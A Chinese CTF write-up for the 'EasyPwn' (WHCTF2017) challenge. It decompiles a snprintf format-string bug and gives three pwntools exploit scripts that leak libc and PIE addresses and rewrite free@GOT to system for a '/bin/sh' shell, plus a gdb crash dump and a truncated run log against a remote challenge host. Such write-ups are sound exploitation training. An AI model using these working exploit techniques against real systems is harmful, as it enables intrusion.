攻防世界Easypwn-格式化字符串漏洞利用


解题思路

基本信息查询

healer@healer:~/Documents/CTF/PWN/3.FormatStringVulnerability/EasyPwn$ readelf -h pwn1
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              DYN (Shared object file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0xa00
  Start of program headers:          64 (bytes into file)
  Start of section headers:          8640 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         9
  Size of section headers:           64 (bytes)
  Number of section headers:         29
  Section header string table index: 28
healer@healer:~/Documents/CTF/PWN/3.FormatStringVulnerability/EasyPwn$ checksec pwn1
[*] '/home/healer/Documents/CTF/PWN/3.FormatStringVulnerability/EasyPwn/pwn1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

漏洞分析

初步分析发现,下面的函数在执行 snprintf() 时存在格式化字符串漏洞:从栈布局可以看到,格式串 v3(内容为 "%s",位于 sp+0x7f8)正好落在 snprintf() 的输出缓冲区 v2(从 sp+0x410 开始,最多写入 0x7d0 字节)内部,偏移为 0x3e8。因此只要输入超过 0x3e8 字节,被 "%s" 拷贝进 v2 的数据就会覆盖正在解析的格式串,输入中 0x3e8 字节之后的内容就成了我们可控的格式串(另外 read() 读 0x438 字节而 s 只有 0x400 字节,会多溢出 0x38 字节到 v2 开头,但这部分随后会被 snprintf() 的输出覆盖,本题没有用到)。
利用这个原语先泄露 libc 地址和程序基址(开了 PIE),再把 free 的 GOT 表项(程序是 Partial RELRO,GOT 可写)改写为 system 的地址;最后走程序的正常流程,在“输入名字”功能中输入 "/bin/sh",程序对名字缓冲区调用 free 时实际执行的就是 system("/bin/sh")。

// Decompiled (IDA) handler for menu option "1".  Frame layout, taken from the
// decompiler's stack annotations below:
//   s  : sp+0x010, 0x400 bytes   user input
//   v2 : sp+0x410, 0x7e8 bytes   snprintf() destination
//   v3 : sp+0x7f8, 8 bytes       the format string "%s"  == v2 + 0x3e8
//   v4 : sp+0xbf8                saved stack canary
// Two things go wrong:
//   1. read() accepts 0x438 bytes but s is only 0x400 bytes, so up to 0x38
//      bytes of input spill into the start of v2 (harmless by itself, since
//      snprintf() overwrites v2 anyway).
//   2. v3 lies inside v2, 0x3e8 bytes in, while snprintf() may write up to
//      0x7d0 bytes there.  Input longer than 0x3e8 bytes therefore overwrites
//      the "%s" format string while snprintf() is still parsing it, and the
//      tail of the input is interpreted as an attacker-controlled format
//      string (the "%N$p" / "%Nc%N$hhn" primitives used by the exploit).
__int64 sub_B30()
{
  char s; // [sp+10h] [bp-BF0h]@1  input buffer, 0x400 bytes (see memset below)
  char v2; // [sp+410h] [bp-7F0h]@1  snprintf() output buffer, 0x7e8 bytes
  __int64 v3; // [sp+7F8h] [bp-408h]@1  format string; overlaps v2[0x3e8..0x3ff]
  __int64 v4; // [sp+BF8h] [bp-8h]@1  stack canary copy

  v4 = *MK_FP(__FS__, 40LL);  // load the canary from fs:0x28
  memset(&s, 0, 0x400uLL);
  memset(&v3, 0, 8uLL);
  memset(&v2, 0, 0x7E8uLL);
  LOWORD(v3) = 29477;  // 0x7325 little-endian: '%' (0x25), 's' (0x73) -> "%s"
  BYTE2(v3) = 0;  // NUL terminator of the format string
  puts("Welcome To WHCTF2017:");
  read(0, &s, 0x438uLL);  // 0x438 > 0x400: up to 0x38 bytes overflow into v2
  snprintf(&v2, 0x7D0uLL, (const char *)&v3, &s);  // destination range [v2, v2+0x7d0) covers &v3
  printf("Your Input Is :%s\n", &v2);  // echoes the processed buffer: this is the leak channel
  return *MK_FP(__FS__, 40LL) ^ v4;  // canary check (compiled code calls __stack_chk_fail on mismatch)
}

漏洞利用脚本

此题的一些思考

做这道题时 free() 已经被调用过一次(延迟绑定:调用过之后 GOT 表项里才是 free 在 libc 中的真实地址),而 free 和 system 的地址只有低三个字节不同(本地为 0x7ffff7a91540 和 0x7ffff7a523a0),因此只需改写 GOT 表项的低三个字节。可以逐字节(%hhn)改三次,也可以逐字(%hn)改,只是每次要输出的字符更多;也可以先改一个字再改一个字节;直接一次改四个字节则没有成功(原因见下面“直接写入双字脚本”一节的说明)。

这个题因为开了动态地址随机化,所以每一次加载的位置都不一样并且获得的system函数的值也不一样,所以构造的格式化字符串的详细数值(控制写入的字符个数值)也是不一样的,指定的位置(指向目标地址的指针)在栈中的偏移是可以确定的,所以构造的格式化字符串要动态生成。并且要首先泄露进程的加载地址,以及函数的加载地址,需要通过前期泄露出来。

可能脚本中的方法略显笨拙,大佬勿喷,汗!!!

逐字节修改方法

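from pwn import *

# Remote exploit for the XCTF "EasyPwn" binary (pwn1), byte-by-byte variant.
#
# Bug: menu option "1" runs snprintf(v2, 0x7d0, fmt, s) where the 8-byte
# format string fmt ("%s") lives INSIDE the destination buffer v2, 0x3e8 bytes
# in.  Once 0x3e8 bytes of our input have been copied, the following bytes
# overwrite the format string itself, so everything after the 0x3e8-byte
# prefix is parsed as a format string, with our own input reachable through
# positional "%N$..." arguments.
#
# Plan: leak a libc address (%397$p) and a program address (%396$p), compute
# system() and free@GOT, then rewrite the three low bytes of free@GOT with one
# "%Nc%133$hhn" write per request (free and system differ only in those
# bytes).  Option "2" then free()s the name we enter, i.e. system("/bin/sh").

context.log_level = "debug"
context.terminal = ["terminator", "-x", "sh", "-c"]
context(arch="amd64", os="linux")

HOST, PORT = "111.200.241.244", 48509

# Input that must come first so that the specifiers that follow it land on the
# format string (v3 == v2 + 0x3e8).
FMT_PREFIX = b"a" * 0x3e8

# The specifier part of every write payload is padded to exactly 16 bytes, so
# the pointer packed right after it always occupies the same 8-byte stack
# slot: positional argument 133 (found empirically with "%N$p" probing).
FMT_LEN = 16
PTR_ARG = 133

# main() returns into __libc_start_main+240 on the target's glibc (2.23); the
# value leaked with %397$p is that return address.
LIBC_START_MAIN_RET_OFF = 240


def choose(io, code: bytes) -> None:
    """Answer the menu prompt with *code* (b"1": format bug, b"2": set name)."""
    io.recvuntil(b"Input Your Code:")
    io.sendline(code)


def leak(io, arg_index: int) -> int:
    """Return the 8-byte value printed by "%<arg_index>$p" through the format bug."""
    choose(io, b"1")
    io.recvuntil(b"Welcome To WHCTF2017:")
    # "bb%397$p" is exactly 8 bytes, i.e. it replaces the whole "%s\0" format.
    io.sendline(FMT_PREFIX + b"bb%" + str(arg_index).encode() + b"$p")
    # The program echoes the buffer and the leaked value appears as "0x<hex>"
    # on its own line right after our input; read the rest of that line rather
    # than assuming a fixed number of hex digits.
    io.recvuntil(b"0x")
    return int(io.recvline().strip(), 16)


def write_byte(io, addr: int, value: int) -> None:
    """Store the byte *value* (0..255) at *addr* with one "%Nc%133$hhn" round.

    The character count seen by %hhn is: 0x3e8 prefix bytes + 16 bytes of
    specifiers + the 6 non-NUL bytes of the packed pointer (the "%s" copy stops
    at the pointer's first NUL byte) = 0x3fe, plus the N characters emitted by
    "%Nc".  0x3fe == -2 (mod 256), so N = value + 2 (range 2..257) makes the
    low byte of the count equal *value*.  N is never 0, which matters because
    "%0c" would still print one character.

    Raises:
        ValueError: if *value* does not fit in one byte.
    """
    if not 0 <= value <= 0xFF:
        raise ValueError(f"write_byte: {value:#x} is not a byte")
    spec = b"bb%" + str(value + 2).encode() + b"c%" + str(PTR_ARG).encode() + b"$hhn"
    spec = spec.ljust(FMT_LEN, b"A")
    choose(io, b"1")
    io.recvuntil(b"Welcome To WHCTF2017:")
    io.sendline(FMT_PREFIX + spec + p64(addr))


def set_name(io, name: bytes) -> None:
    """Take menu option "2" and enter *name*.

    Per the write-up the program free()s the name buffer, so this both resolves
    free@GOT (lazy binding) and, once the GOT is patched, calls system(name).
    """
    choose(io, b"2")
    io.recvuntil(b"Input Your Name:")
    io.sendline(name)


def main() -> None:
    io = remote(HOST, PORT)
    libc = ELF("./libc.so.6")
    elf = ELF("./pwn1")

    # 1. libc base from main's return address into __libc_start_main.
    libc_start_main_ret = leak(io, 397)
    libc.address = libc_start_main_ret - LIBC_START_MAIN_RET_OFF - libc.symbols["__libc_start_main"]
    system_real_addr = libc.symbols["system"]
    log.info(f"libc base: {libc.address:#x}")
    log.info(f"system_real_addr: {system_real_addr:#x}")

    # 2. Call free() once so its GOT slot holds the resolved libc address
    #    (lazy binding; Partial RELRO leaves the GOT writable).
    set_name(io, b"healer")

    # 3. PIE base.  %396$p leaks a code pointer into the binary whose in-file
    #    offset is below 0x1000 (observed 0x...da0), so masking the low 12 bits
    #    gives the load base.  NOTE(review): this relies on that offset staying
    #    under one page; use elf.symbols if the binary ever changes.
    init_real_addr = leak(io, 396)
    log.info(f"init_real_addr: {init_real_addr:#x}")
    elf.address = init_real_addr & ~0xFFF
    free_got_addr = elf.got["free"]  # base + 0x202018 for this binary
    log.info(f"free_got_addr: {free_got_addr:#x}")

    # 4. free@GOT -> system(), low byte first, one request per byte.
    for i in range(3):
        write_byte(io, free_got_addr + i, (system_real_addr >> (8 * i)) & 0xFF)

    # 5. free("/bin/sh") is now system("/bin/sh").
    set_name(io, b"/bin/sh")
    io.interactive()


if __name__ == "__main__":
    main()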

一字加一字节方法写入脚本

此脚本用在本地关了地址随机化时的测试,本地调试成功的,方法都是一样的,再加上地址随机化的处理即可作为有效的exp

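from pwn import *

# Local test (ASLR disabled) of the "one word + one byte" variant: free@GOT is
# patched to system() with a "%Nc%133$hn" write of the low 16 bits followed by
# a "%Nc%133$hhn" write of the third byte.
#
# The hand-written version hard-coded the widths 8098 and 167 for the no-ASLR
# system address 0x7ffff7a523a0; here they are derived from the leaked address
# so the same script also works with ASLR on.
#
# Bug recap: option "1" runs snprintf(v2, 0x7d0, "%s", s) with the format
# string stored inside v2 at offset 0x3e8, so input beyond 0x3e8 bytes
# overwrites the format string while it is being parsed.

context.log_level = "debug"
context.terminal = ["terminator", "-x", "sh", "-c"]
context(arch="amd64", os="linux")

# Input that must come first so that the specifiers land on the format string.
FMT_PREFIX = b"a" * 0x3e8

# Specifier block padded to 16 bytes so the packed pointer after it always sits
# in positional argument slot 133.
FMT_LEN = 16
PTR_ARG = 133

# Characters already counted when "%Nc" starts: the prefix, the 16-byte
# specifier block and the 6 non-NUL bytes of the packed pointer (the "%s" copy
# stops at the pointer's first NUL byte).  All widths are relative to this.
COUNT_BEFORE_PAD = 0x3e8 + FMT_LEN + 6  # 0x3fe

# main() returns into __libc_start_main+240 (glibc 2.23).
LIBC_START_MAIN_RET_OFF = 240

# "call snprintf" in the vulnerable function at the no-ASLR PIE base
# 0x555555554000 (the gdb backtrace returns to 0x555555554c0a).
SNPRINTF_CALL = 0x555555554c05


def pad_count(target: int, bits: int) -> int:
    """Width N for "%Nc" so that the count seen by the following %hn (bits=16)
    or %hhn (bits=8) equals *target* modulo 2**bits.

    N is forced non-zero because "%0c" still emits one character.  For
    system == 0x7ffff7a523a0 this yields 8098 (low word 0x23a0) and 167 (third
    byte 0xa5), the constants used in the hand-written version.
    """
    modulus = 1 << bits
    n = (target - COUNT_BEFORE_PAD) % modulus
    return n if n else modulus


def choose(io, code: bytes) -> None:
    """Answer the menu prompt with *code*."""
    io.recvuntil(b"Input Your Code:")
    io.sendline(code)


def leak(io, arg_index: int, attach: bool = False) -> int:
    """Return the value printed by "%<arg_index>$p"; optionally attach gdb first."""
    choose(io, b"1")
    io.recvuntil(b"Welcome To WHCTF2017:")
    if attach:
        gdb.attach(io, f"b * {SNPRINTF_CALL:#x}")
    io.sendline(FMT_PREFIX + b"bb%" + str(arg_index).encode() + b"$p")
    # The leaked value is echoed as "0x<hex>" on its own line.
    io.recvuntil(b"0x")
    return int(io.recvline().strip(), 16)


def fmt_write(io, addr: int, width: int, conv: bytes) -> None:
    """One format-string round: "%<width>c%133$<conv>" with p64(addr) in slot 133.

    *conv* is b"hn" (2-byte store) or b"hhn" (1-byte store); *width* should
    come from pad_count().
    """
    spec = b"bb%" + str(width).encode() + b"c%" + str(PTR_ARG).encode() + b"$" + conv
    spec = spec.ljust(FMT_LEN, b"A")
    choose(io, b"1")
    io.recvuntil(b"Welcome To WHCTF2017:")
    io.sendline(FMT_PREFIX + spec + p64(addr))


def set_name(io, name: bytes) -> None:
    """Menu option "2": enter *name* (the program free()s it per the write-up)."""
    choose(io, b"2")
    io.recvuntil(b"Input Your Name:")
    io.sendline(name)


def main() -> None:
    io = process("./pwn1")
    libc = ELF("./libc.so.6")
    elf = ELF("./pwn1")

    # libc base from the return address into __libc_start_main.
    libc.address = leak(io, 397, attach=True) - LIBC_START_MAIN_RET_OFF - libc.symbols["__libc_start_main"]
    system_real_addr = libc.symbols["system"]
    log.info(f"system_real_addr: {system_real_addr:#x}")

    # Resolve free@GOT once (lazy binding) before patching it.
    set_name(io, b"healer")

    # PIE base: the leaked in-binary pointer sits below offset 0x1000, so the
    # page mask recovers the load base.
    init_real_addr = leak(io, 396)
    log.info(f"init_real_addr: {init_real_addr:#x}")
    elf.address = init_real_addr & ~0xFFF
    free_got_addr = elf.got["free"]  # base + 0x202018 in this binary
    log.info(f"free_got_addr: {free_got_addr:#x}")

    # free@GOT: low word with %hn, then the third byte with %hhn.  Bytes 3..7
    # are already identical between free() and system().
    low_word = system_real_addr & 0xFFFF
    third_byte = (system_real_addr >> 16) & 0xFF
    fmt_write(io, free_got_addr, pad_count(low_word, 16), b"hn")
    fmt_write(io, free_got_addr + 2, pad_count(third_byte, 8), b"hhn")

    # free("/bin/sh") is now system("/bin/sh").
    set_name(io, b"/bin/sh")
    io.interactive()


if __name__ == "__main__":
    main()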

直接写入双字脚本

这个方法没有成功,写入目标地址时出现了下面的崩溃。从 gdb 输出能看出两个问题:一是崩溃指令 `mov dword ptr [rax], r15d` 中 rax = 0x6161616161616161(全是 'a'),说明 %134$n 取到的并不是 free 的 GOT 地址——这里的格式串部分有 23 字节,没有像逐字节脚本那样补齐到 16 字节,p64(free_got_addr) 落在 v2+0x3ff 这个非 8 字节对齐的位置,推测因此没有任何一个参数槽装着完整的指针;二是 r15d = 0x7a527a0 也不是 system 的低 4 字节 0xf7a523a0(脚本里把 0xf7a523a0 写成了 0x7a523a0)。更根本的是,用一个 %n 一次写出 0xf7a523a0 需要先输出约 41 亿个字符,而 glibc 对 ≥ INT_MAX 的宽度会直接以 EOVERFLOW 失败(done 计数本身也是 int),所以“一次改四个字节”在这里行不通,一次最多用 %hn 改两个字节。

# Failed attempt: patch the low dword of free@GOT with a single "%Nc%134$n".
# Kept for reference together with the gdb crash below.  What goes wrong
# (see the crash dump that follows this script):
#   * the store faults as `mov dword ptr [rax], r15d` with rax =
#     0x6161616161616161 ('aaaaaaaa'): the pointer fetched by %134$n is not
#     free@GOT.  The specifier block here is 23 bytes instead of the 16 bytes
#     the working scripts pad to, so p64(free_got_addr) lands at v2+0x3ff,
#     which is not 8-byte aligned; presumably no argument slot holds the
#     whole pointer.
#   * r15d = 0x7a527a0 is the count about to be written; system()'s low dword
#     is 0xf7a523a0 (free 0x7ffff7a91540 -> system 0x7ffff7a523a0), so the
#     width 128263072 == 0x7a523a0 dropped the top nibble.
#   * Even with the right width, glibc rejects a field width >= INT_MAX with
#     EOVERFLOW (the "done" counter is an int), so ~4.15e9 characters can
#     never be produced and a one-shot 4-byte %n write is not possible here.
#     Two %hn writes (or %hn + %hhn, as in the scripts above) are the fix.
from pwn import *
context.log_level='debug'
context.terminal = ['terminator', '-x', 'sh', '-c']

# io = remote("220.249.52.134",59762)

io = process("./pwn1")
libc = ELF("./libc.so.6")
elf = ELF("./pwn1")

context(arch = "amd64", os = 'linux')

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# Break on the "call snprintf" in the vulnerable function (no-ASLR PIE base
# 0x555555554000; the backtrace below returns to 0x555555554c0a).
gdb.attach(io,"b * 0x555555554c05")
# 0x3e8 bytes fill v2 up to the embedded "%s" format string; "bb%397$p" then
# replaces it and leaks main's return address into __libc_start_main.
payload = b"a"*0x3e8 + b"bb%397$p"
io.sendline(payload)

io.recvuntil("0x")
libc_start_main = io.recv(12)
# __libc_start_main+240 is the return address on glibc 2.23.
libc_start_main = int(b"0x"+libc_start_main,16) - 240

log.info("libc_start_main: "+hex(libc_start_main))

libc_start_main_libc = libc.symbols["__libc_start_main"]
log.info("libc_start_main_libc: "+hex(libc_start_main_libc))
system_addr = libc.symbols["system"]
log.info("system_addr: "+hex(system_addr))
offset = libc_start_main_libc - system_addr
# 24C50
system_real_addr = libc_start_main - offset
log.info("system_real_addr: "+hex(system_real_addr))


# Call free() once so its GOT slot holds the resolved libc address.
io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("healer")

# %396$p leaks a code pointer inside the PIE binary (offset below 0x1000).
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + b"bb%396$p"
io.sendline(payload)

io.recvuntil("0x")
init_real_addr = io.recv(12)
init_real_addr = int(b"0x"+init_real_addr,16)
log.info("init_real_addr: "+hex(init_real_addr))

# Page-align the leak to get the load base; 0x202018 is free@GOT in pwn1.
elf_base = 0xFFFFFFFFFFFFF000 & init_real_addr
free_got_addr = elf_base + 0x202018
log.info("free_got_addr: "+hex(free_got_addr))




io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# payload = b"a"*0x3e8 + b"bb%135$p%136$p%137$p%138$p%139$p%140$p%141$p%142$p%143$p%144$p%145$p%146$p"
# payload = b"a"*0x3e0 + p64(free_got_addr) + b"bb%4154793912c%130$n" 
# BROKEN (see header comment): 23-byte specifier block (pointer misaligned in
# the argument slots) and a width that is neither system's low dword nor
# representable as a printf width.
payload = b"a"*0x3e8 + b"bb%128263072c%134$nAAAA" + p64(free_got_addr) 
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
io.sendline(payload)
# 0x00007ffff7a91540 -> 0x7ffff7a523a0
# bb%8118c%135$hn%5c%136$hhnAAAAAA
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
# 83:0418│      0x7fffffffd568 —▸ 0x555555756018 —▸ 0x7ffff7a91540 (free) ◂— push   r13
# 84:0420│      0x7fffffffd570 —▸ 0x55555575601a ◂— 0xc6a000007ffff7a9

# The three store instructions in printf_positional for %hn / %hhn / %n:
# 0x7ffff7a59f59 <printf_positional+8697>    mov    word ptr [rax], r15w
# 0x7ffff7a590f7 <printf_positional+5015>    mov    byte ptr [rax], r15b
# 0x7ffff7a59bd6 <printf_positional+7798>    mov    dword ptr [rax], r15d
# 0x7fffffffbfe0 ◂— 0x60186e6868243233


io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("/bin/sh")

io.interactive()

'''
pwndbg> watch * 0x555555756018
Hardware watchpoint 2: * 0x555555756018
pwndbg> c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7a59bd6 in printf_positional (s=s@entry=0x7fffffffcf10, format=format@entry=0x7fffffffd948 "bb%128263072c%134$nAAAA\030", ' ' <repeats 176 times>..., readonly_format=readonly_format@entry=0, ap=ap@entry=0x7fffffffd078, ap_savep=ap_savep@entry=0x7fffffffcaa8, done=128264096, nspecs_done=2, lead_str_end=0x7fffffffd948 "bb%128263072c%134$nAAAA\030", ' ' <repeats 176 times>..., work_buffer=0x7fffffffcae0 "x\320\377\377\377\177", save_errno=0, grouping=0x0, thousands_sep=0x7ffff7b99be5 "") at vfprintf.c:2022
2022    vfprintf.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────[ REGISTERS ]──────────────────────────────────
*RAX  0x6161616161616161 ('aaaaaaaa')
*RBX  0x7fffffffb780 ◂— 0xffffd160
*RCX  0x0
*RDX  0x17
*RDI  0x7ffff7a58bd0 (printf_positional+3696) ◂— mov    rsi, qword ptr [r14 + 0x38]
*RSI  0x20
*R8   0x0
*R9   0x6e
*R10  0x6e
*R11  0x0
*R12  0x0
*R13  0x7fffffffcf10 ◂— 0xfbad8001
*R14  0x7fffffffc5b0 ◂— 0xffffffff
*R15  0x7a527a0
*RBP  0x7fffffffc950 —▸ 0x7fffffffcf00 —▸ 0x7fffffffd560 ◂— 0x6161616161616161 ('aaaaaaaa')
*RSP  0x7fffffffb780 ◂— 0xffffd160
*RIP  0x7ffff7a59bd6 (printf_positional+7798) ◂— mov    dword ptr [rax], r15d
────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────
 ► 0x7ffff7a59bd6 <printf_positional+7798>    mov    dword ptr [rax], r15d
   0x7ffff7a59bd9 <printf_positional+7801>    jmp    printf_positional+1666 <printf_positional+1666>
    ↓
   0x7ffff7a583e2 <printf_positional+1666>    mov    rax, qword ptr [rbp - 0x478]
   0x7ffff7a583e9 <printf_positional+1673>    test   rax, rax
   0x7ffff7a583ec <printf_positional+1676>    je     printf_positional+1686 <printf_positional+1686>
    ↓
   0x7ffff7a583f6 <printf_positional+1686>    test   r15d, r15d
   0x7ffff7a583f9 <printf_positional+1689>    js     printf_positional+9059 <printf_positional+9059>
    ↓
   0x7ffff7a5a0c3 <printf_positional+9059>    lea    rcx, [rip + 0x146816] <0x7ffff7ba08e0>
   0x7ffff7a5a0ca <printf_positional+9066>    lea    rsi, [rip + 0x13fdcb]
   0x7ffff7a5a0d1 <printf_positional+9073>    lea    rdi, [rip + 0x143740]
   0x7ffff7a5a0d8 <printf_positional+9080>    mov    edx, 0x80e
─────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────
00:0000│ rbx rsp  0x7fffffffb780 ◂— 0xffffd160
01:0008│          0x7fffffffb788 ◂— 0x0
02:0010│          0x7fffffffb790 —▸ 0x7ffff7fde700 ◂— 0x7ffff7fde700
03:0018│          0x7fffffffb798 ◂— 0x0
04:0020│          0x7fffffffb7a0 ◂— 0x555599999999
05:0028│          0x7fffffffb7a8 ◂— 0x0
... ↓
───────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────
 ► f 0     7ffff7a59bd6 printf_positional+7798
   f 1     7ffff7a5a4b6 vfprintf+822
   f 2     7ffff7a83a59 vsnprintf+121
   f 3     7ffff7a62942 snprintf+130
   f 4     555555554c0a
   f 5     555555554cf9
   f 6     7ffff7a2d840 __libc_start_main+240
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> 

'''

脚本执行结果

healer@healer-virtual-machine:~/Desktop/EasyPwn$ python3 exp.py 
[+] Opening connection to 111.200.241.244 on port 48509: Done
[DEBUG] PLT 0x1f7f0 realloc
[DEBUG] PLT 0x1f800 __tls_get_addr
[DEBUG] PLT 0x1f820 memalign
[DEBUG] PLT 0x1f850 _dl_find_dso_for_object
[DEBUG] PLT 0x1f870 calloc
[DEBUG] PLT 0x1f8a0 malloc
[DEBUG] PLT 0x1f8a8 free
[*] '/home/healer/Desktop/EasyPwn/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[DEBUG] PLT 0x920 free
[DEBUG] PLT 0x930 puts
[DEBUG] PLT 0x940 write
[DEBUG] PLT 0x950 __stack_chk_fail
[DEBUG] PLT 0x960 printf
[DEBUG] PLT 0x970 snprintf
[DEBUG] PLT 0x980 memset
[DEBUG] PLT 0x990 read
[DEBUG] PLT 0x9a0 __libc_start_main
[DEBUG] PLT 0x9b0 malloc
[DEBUG] PLT 0x9c0 setvbuf
[DEBUG] PLT 0x9d0 atoi
[DEBUG] PLT 0x9e0 __isoc99_scanf
[DEBUG] PLT 0x9f0 __gmon_start__
[DEBUG] PLT 0x9f8 __cxa_finalize
[*] '/home/healer/Desktop/EasyPwn/pwn1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[DEBUG] Received 0x11 bytes:
    b'Input Your Code:\n'
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Received 0x15 bytes:
    b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x3f1 bytes:
    b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%397$p\n'
[DEBUG] Received 0x1 bytes:
    b'\n'
[DEBUG] Received 0x421 bytes:
    b'Your Input Is :aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%397$p\n'
    b'0x7fbf673df830\n'
    b'\n'
    b'Input Your Code:\n'
[*] libc_start_main: 0x7fbf673df740
[*] libc_start_main_libc: 0x20740
[*] system_addr: 0x45390
[*] system_real_addr: 0x7fbf67404390
[DEBUG] Sent 0x2 bytes:
    b'2\n'
[DEBUG] Received 0x11 bytes:
    b'Input Your Name:\n'
[DEBUG] Sent 0x7 bytes:
    b'healer\n'
[DEBUG] Received 0x20 bytes:
    b'OK!I Know Your Name :healer\n'
    b'Now!'
[DEBUG] Received 0x11 bytes:
    b'Input Your Code:\n'
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Received 0x15 bytes:
    b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x3f1 bytes:
